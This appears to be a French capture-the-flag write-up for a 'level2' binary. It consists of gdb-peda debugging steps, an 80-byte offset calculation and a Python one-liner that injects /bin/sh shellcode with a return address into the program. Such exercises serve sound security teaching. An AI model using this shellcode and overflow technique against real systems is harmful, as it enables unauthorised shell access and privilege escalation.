
source /tmp/peda/peda.py
set disassembly-flavor intel
b *0x080484e7 (p+19)
start
si (plusieurs fois)
fini
a p+19: i f

Stack level 0, frame at 0xbffff710:
 eip = 0x80484e7 in p; saved eip 0x804854a
 called by frame at 0xbffff720
 Arglist at 0xbffff708, args:
 Locals at 0xbffff708, Previous frame's sp is 0xbffff710
 Saved registers:
  ebp at 0xbffff708, eip at 0xbffff70c

p $ebp-0x4c
--> $1 = (void *) 0xbffff6bc

distance 0xbffff6bc 0xbffff70c
--> From 0xbffff6bc to 0xbffff70c: 80 bytes, 20 dwords

b *0x0804853d (p+105)
p $eax
--> $2 = 0x804a008 (adr de retour de strdup)

On execute le shellcode suivi de (80 - taille du shellcode) caracteres suivi de l'adresse de retour de strdup:

python -c 'print "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42" + "\x41" * 25 + "\x08\xa0\x04\x08"' > /tmp/tmpp
cat /tmp/tmpp - | ./level2

